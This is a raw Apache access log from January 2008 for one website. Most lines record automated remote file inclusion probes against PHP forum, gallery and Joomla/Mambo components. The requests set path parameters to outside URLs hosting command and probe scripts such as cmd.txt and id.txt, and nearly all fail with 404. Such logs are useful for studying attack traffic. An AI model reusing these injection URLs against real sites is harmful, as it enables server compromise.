66.70.70.169 - - [18/Jan/2008:04:06:11 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://prevecamformacion.com/images/.smd/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.70.169 - - [18/Jan/2008:04:06:11 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://prevecamformacion.com/images/.smd/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.16.176.92 - - [18/Jan/2008:04:07:08 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.16.176.92 - - [18/Jan/2008:04:07:08 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.62.12.248 - - [18/Jan/2008:04:08:25 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [18/Jan/2008:04:08:25 -0800] "GET /modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [18/Jan/2008:04:08:25 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [18/Jan/2008:04:10:13 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:11:10 -0800] "GET /logs/access_071229.log//modules/xgallery/modify_user.php?init=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:11:10 -0800] "GET //modules/xgallery/modify_user.php?init=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:11:10 -0800] "GET /logs//modules/xgallery/modify_user.php?init=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:04:11:18 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:04:11:19 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:04:11:19 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.20 - - [18/Jan/2008:04:12:39 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.flexit.se/dyn/content/images/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:12:46 -0800] "GET /logs/access_071229.log//modules/xgallery/rename_album.php?set_albumName=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:12:46 -0800] "GET //modules/xgallery/rename_album.php?set_albumName=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:12:46 -0800] "GET /logs//modules/xgallery/rename_album.php?set_albumName=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:04:13:19 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:04:13:19 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:14:18 -0800] "GET /logs/access_071229.log//modules/xgallery/album_permissions.php?set_albumName=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:14:18 -0800] "GET //modules/xgallery/album_permissions.php?set_albumName=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:14:19 -0800] "GET /logs//modules/xgallery/album_permissions.php?set_albumName=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:15:35 -0800] "GET /logs/access_071229.log//modules/xgallery/userinfo.php?uid=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:15:35 -0800] "GET //modules/xgallery/userinfo.php?uid=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [18/Jan/2008:04:15:35 -0800] "GET /logs//modules/xgallery/userinfo.php?uid=http://aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.156 - - [18/Jan/2008:04:19:02 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.125.219 - - [18/Jan/2008:04:20:23 -0800] "GET //components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:04:21:03 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.125.219 - - [18/Jan/2008:04:21:14 -0800] "GET /logs/access_071230.log//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [18/Jan/2008:04:21:15 -0800] "GET //components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [18/Jan/2008:04:21:15 -0800] "GET /logs//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:04:21:20 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.125.219 - - [18/Jan/2008:04:21:46 -0800] "GET //components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.135.133.7 - - [18/Jan/2008:04:22:31 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://openair.infinite-server.de/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.135.133.7 - - [18/Jan/2008:04:22:32 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://openair.infinite-server.de/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.135.133.7 - - [18/Jan/2008:04:22:33 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://openair.infinite-server.de/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.226.153 - - [18/Jan/2008:04:24:36 -0800] "GET //components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.69.195.183 - - [18/Jan/2008:04:24:51 -0800] "GET /account.php?action=http://www.ameripol.net/ap_store/language/se/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
218.150.78.201 - - [18/Jan/2008:04:25:22 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
218.150.78.201 - - [18/Jan/2008:04:25:22 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
62.193.226.153 - - [18/Jan/2008:04:27:08 -0800] "GET /logs/access_071230.log//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.226.153 - - [18/Jan/2008:04:27:09 -0800] "GET //components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.226.153 - - [18/Jan/2008:04:27:09 -0800] "GET /logs//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.179.200 - - [18/Jan/2008:04:28:30 -0800] "GET /minamijewelry/html/clearance.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.123.27.136 - - [18/Jan/2008:04:29:08 -0800] "GET /logs/access_071109.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.strider.we.bs/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [18/Jan/2008:04:29:09 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.strider.we.bs/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [18/Jan/2008:04:29:09 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.strider.we.bs/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
134.129.197.99 - - [18/Jan/2008:04:29:35 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.gilmores.ie//images/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.252.149.15 - - [18/Jan/2008:04:30:20 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
193.252.149.15 - - [18/Jan/2008:04:30:22 -0800] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
193.207.106.54 - - [18/Jan/2008:04:30:25 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [18/Jan/2008:04:30:27 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [18/Jan/2008:04:30:29 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.74 - - [18/Jan/2008:04:35:36 -0800] "GET /megumi/earrings/?M=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:04:35:43 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:04:35:48 -0800] "GET /tools/css/phpmyadmin.css.php?lang=en&js_frame=right HTTP/1.0" 200 11204 "http://www.dmulk.com/tools/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
59.106.19.18 - - [18/Jan/2008:04:35:50 -0800] "GET //modules/xgallery/album_permissions.php?set_albumName=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.240 - - [18/Jan/2008:04:36:23 -0800] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://kadausa.org/login? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.29.68.240 - - [18/Jan/2008:04:36:23 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://kadausa.org/login? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:04:36:24 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://64.70.238.131/tep/admin/includes/.r/happynewyear.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [18/Jan/2008:04:38:19 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.gilmores.ie//images/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [18/Jan/2008:04:38:19 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.gilmores.ie//images/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.69.195.183 - - [18/Jan/2008:04:44:38 -0800] "GET /logs/access_071230.log/account.php?action=http://www.ameripol.net/ap_store/language/se/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.195.183 - - [18/Jan/2008:04:44:39 -0800] "GET /logs/account.php?action=http://www.ameripol.net/ap_store/language/se/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.195.183 - - [18/Jan/2008:04:45:05 -0800] "GET /logs/access_071222.log/account.php?action=http://www.ameripol.net/ap_store/language/se/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
59.106.19.18 - - [18/Jan/2008:04:45:52 -0800] "GET /logs/access_071229.log//modules/xgallery/album_permissions.php?set_albumName=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [18/Jan/2008:04:45:53 -0800] "GET /logs//modules/xgallery/album_permissions.php?set_albumName=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.51.202 - - [18/Jan/2008:04:46:23 -0800] "GET /logs/config.inc.php?path_escape=http://usuarios.lycos.es/nullroot/asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [18/Jan/2008:04:46:23 -0800] "GET /config.inc.php?path_escape=http://usuarios.lycos.es/nullroot/asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:04:47:10 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:04:47:10 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:04:47:10 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [18/Jan/2008:04:47:59 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [18/Jan/2008:04:47:59 -0800] "GET //skin/zero_vote/error.php?dir=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [18/Jan/2008:04:48:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:04:48:55 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:04:48:56 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:04:48:56 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.220.109.46 - - [18/Jan/2008:04:49:26 -0800] "GET /?vwar_root=http://mtin.info/tiny_includes/can? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:04:49:53 -0800] "GET /logs/access_071228.log//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.17.226 - - [18/Jan/2008:04:51:47 -0800] "GET /modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:04:52:12 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:04:52:12 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:04:52:13 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:04:52:13 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:04:52:38 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:04:52:39 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:04:52:39 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:04:52:39 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:04:53:09 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:04:53:10 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:04:53:11 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:04:53:11 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:04:53:17 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://64.70.238.131/tep/admin/includes/.r/happynewyear.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:04:53:17 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://64.70.238.131/tep/admin/includes/.r/happynewyear.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:04:57:12 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:04:57:13 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:04:57:13 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.190.51.202 - - [18/Jan/2008:04:57:20 -0800] "GET /logs/access_071229.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/nullroot/asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [18/Jan/2008:04:57:21 -0800] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/nullroot/asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [18/Jan/2008:04:57:21 -0800] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://usuarios.lycos.es/nullroot/asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:04:57:44 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.19 - - [18/Jan/2008:04:57:44 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:04:57:45 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:04:57:45 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.251.147.130 - - [18/Jan/2008:04:59:36 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [18/Jan/2008:04:59:36 -0800] "GET /modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [18/Jan/2008:04:59:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [18/Jan/2008:05:00:03 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [18/Jan/2008:05:00:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [18/Jan/2008:05:00:04 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
